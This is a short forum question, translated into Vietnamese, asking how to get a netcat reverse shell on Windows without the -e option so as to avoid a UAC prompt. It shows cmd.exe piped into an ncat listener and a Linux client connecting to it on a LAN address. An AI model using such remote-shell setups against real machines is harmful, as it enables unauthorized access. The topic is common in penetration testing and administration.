Có cách nào để lấy shell ngược trong Windows bằng netcat mà không cần sử dụng tùy chọn -e vì nó kích hoạt UAC không?
Tôi đã làm cho nó hoạt động từ Linux sang Linux bằng cách sử dụng một đường ống có tên. Tôi muốn đạt được một cái gì đó tương tự trong Windows.
Đang chạy c:\windows\system32\cmd.exe | ncat -l -p 666
trên Windows cho tôi một lời nhắc trong Linux khi tôi kết nối:
# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user> dir
^C
Có vẻ như tôi gần gũi, có lẽ thiếu một cái gì đó đơn giản? Nếu chỉ có tên ống trong Windows ...